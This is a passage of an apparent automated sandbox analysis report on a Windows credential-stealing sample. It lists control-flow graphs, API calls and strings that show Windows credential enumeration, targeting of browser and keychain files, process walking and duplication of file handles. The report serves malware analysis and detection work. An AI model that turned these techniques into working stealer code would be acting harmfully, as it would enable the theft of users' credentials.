445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                  • API String ID: 2263259095-3798722523
                                                                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                  Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                  • API String ID: 2744995895-28296030
                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                  Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                  • String ID: chp$v10
                                                                                                  • API String ID: 4165125987-2783969131
                                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                  Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 530 40e497-40e49f free 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                  APIs
                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                  Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                  • API String ID: 1344430650-1740548384
                                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                  • String ID: bhv
                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                  Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 2941347001-70141382
                                                                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                  Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
